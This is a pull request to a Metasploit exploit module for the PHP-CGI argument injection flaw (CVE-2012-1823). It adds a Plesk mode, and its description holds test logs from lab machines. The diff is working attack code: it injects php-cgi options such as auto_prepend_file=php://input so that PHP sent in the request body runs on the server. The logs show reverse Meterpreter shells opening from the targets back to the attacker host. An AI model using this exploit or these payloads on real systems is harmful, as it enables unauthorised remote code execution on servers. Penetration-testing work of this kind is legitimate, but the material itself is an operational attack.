### PR TITLE
Add support for PLESK on php_cgi_arg_injection

### DIFF
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -23,18 +23,24 @@ class Metasploit3 < Msf::Exploit::Remote
 				the string is split on '+' (encoded space) characters, urldecoded,
 				passed to a function that escapes shell metacharacters (the "encoded in
 				a system-defined manner" from the RFC) and then passes them to the CGI
-				binary."
+				binary." This module can also be used to exploit the plesk 0day disclosed
+				by kingcope and exploited in the wild on June 2013.
 			},
 			'Author'         =>
 				[
-					'egypt', 'hdm', #original msf exploit
-					'jjarmoc'       #added URI encoding obfuscation
+					'egypt', 'hdm',  #original msf exploit
+					'jjarmoc',       #added URI encoding obfuscation
+					'kingcope',      #plesk poc
+					'juan vazquez'   #add support for plesk exploitation
 				],
 			'License'        => MSF_LICENSE,
 			'References'     => [
-					[ 'CVE'	, '2012-1823' ],
+					[ 'CVE', '2012-1823' ],
 					[ 'OSVDB', '81633'],
-					[ 'URL'	, 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ],
+					[ 'OSVDB', '93979'],
+					[ 'EDB', '25986'],
+					[ 'URL', 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ],
+					[ 'URL', 'http://kb.parallels.com/en/116241']
 				],
 			'Privileged'     => false,
 			'Payload'        =>
@@ -53,22 +59,20 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options([
 			OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
 			OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",0]),
-			], self.class)
+			OptBool.new('PLESK', [true, "Exploit Plesk", false]),
+		], self.class)
 	end
 
 	# php-cgi -h
 	# ...
 	#   -s               Display colour syntax highlighted source.
 	def check
-		uri = normalize_uri(target_uri.path)
-
-		uri.gsub!(/\?.*/, "")
 
 		print_status("Checking uri #{uri}")
 
 		response = send_request_raw({ 'uri' => uri })
 
-		if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
+		if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi and not datastore['PLESK']
 			print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
 			return Exploit::CheckCode::Unknown
 		end
@@ -78,8 +82,28 @@ class Metasploit3 < Msf::Exploit::Remote
 			return Exploit::CheckCode::Vulnerable
 		end
 
+		if datastore['PLESK'] and response and response.code == 500
+			return Exploit::CheckCode::Appears
+		end
+
 		print_error("Server responded indicating it was not vulnerable")
 		return Exploit::CheckCode::Safe
+	end
+
+	def uri
+		if datastore['PLESK']
+			normalize_uri("phppath", "php")
+		else
+			normalize_uri(target_uri.path).gsub(/\?.*/, "")
+		end
+	end
+
+	def uri_encoding_level
+		if datastore['PLESK']
+			return 0
+		else
+			return datastore['URIENCODING']
+		end
 	end
 
 	def exploit
@@ -92,19 +116,17 @@ class Metasploit3 < Msf::Exploit::Remote
 				create_arg("-d",'disable_functions=""'),
 				create_arg("-d","open_basedir=none"),
 				create_arg("-d","auto_prepend_file=php://input"),
-				create_arg("-n")
+				rand_opt_equiv("-n")
 			]
 
 			qs = args.join()
-			uri = normalize_uri(target_uri.path)
-			uri = "#{uri}?#{qs}"
 
 			# Has to be all on one line, so gsub out the comments and the newlines
 			payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
 			response = send_request_cgi( {
 				'method' => "POST",
 				'global' => true,
-				'uri'    => uri,
+				'uri'    => "#{uri}?#{qs}",
 				'data'   => payload_oneline,
 			}, 0.5)
 			handler
@@ -166,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def rand_encode(string, max = string.length)
 		# Randomly URI encode characters from string, up to max times.
 		chars = [];
-		if max > datastore["URIENCODING"] then max = datastore["URIENCODING"] end
+		if max > uri_encoding_level then max = uri_encoding_level end
 		if string.length == 1
 			if rand(2) > 0
 				chars << 0
@@ -180,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		string
 	end
 
-	def rand_spaces(num = datastore["URIENCODING"])
+	def rand_spaces(num = uri_encoding_level)
 		ret = ''
 		num.times {
 			ret << rand_space
@@ -189,11 +211,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def rand_space
-		datastore["URIENCODING"] > 0 ? ["%20","%09","+"][rand(3)] : "+"
+		uri_encoding_level > 0 ? ["%20","%09","+"][rand(3)] : "+"
 	end
 
 	def rand_dash
-		datastore["URIENCODING"] > 0 ? ["-","%2d","%2D"][rand(3)] : "-"
+		uri_encoding_level > 0 ? ["-","%2d","%2D"][rand(3)] : "-"
 	end
 
 	def rand_php_ini_false


### PR DESCRIPTION
This pull request modifies the php_cgi_arg_injection exploit in orde to be compatible with the Plesk exploit disclosed by kingcope: http://www.exploit-db.com/exploits/25986/

It's a small variation from cve-2012-1823 (php cgi interpreter calles to display a php vs php interpreter called directly as pointed by kcope). But since the exploitation is the same, modifying the current one.

I've added a PLESK option to automate the PLESK exploitation since URL will be static in the PLESK case, plus the check detection a little different (we're calling the interpreter directly). Also the URI Encoding level should be static in the PLESK case according to my test.

I've tested against a PLESK 9.0 on CentOS 5.9:

```
msf exploit(php_cgi_arg_injection) > set PLESK true
PLESK => true
msf exploit(php_cgi_arg_injection) > set RHOST 192.168.172.129
RHOST => 192.168.172.129
msf exploit(php_cgi_arg_injection) > check

[*] Checking uri /phppath/php
[*] The target appears to be vulnerable.
msf exploit(php_cgi_arg_injection) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Sending stage (39195 bytes) to 192.168.172.129
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.129:34224) at 2013-07-04 08:18:40 -0500

meterpreter > getuid
Server username: apache (48)
meterpreter > exit
```

And tested which the exploit exploit works for the cve-2012-1823 on a Ubuntu 10.04 with php-cgi:

```
msf exploit(php_cgi_arg_injection) > set TARGETURI /test.php
TARGETURI => /test.php
msf exploit(php_cgi_arg_injection) > check

[*] Checking uri /test.php
[+] The target is vulnerable.
msf exploit(php_cgi_arg_injection) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Sending stage (39195 bytes) to 192.168.172.131
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.131:34037) at 2013-07-04 08:18:02 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > exit
[*] Shutting down Meterpreter...

```
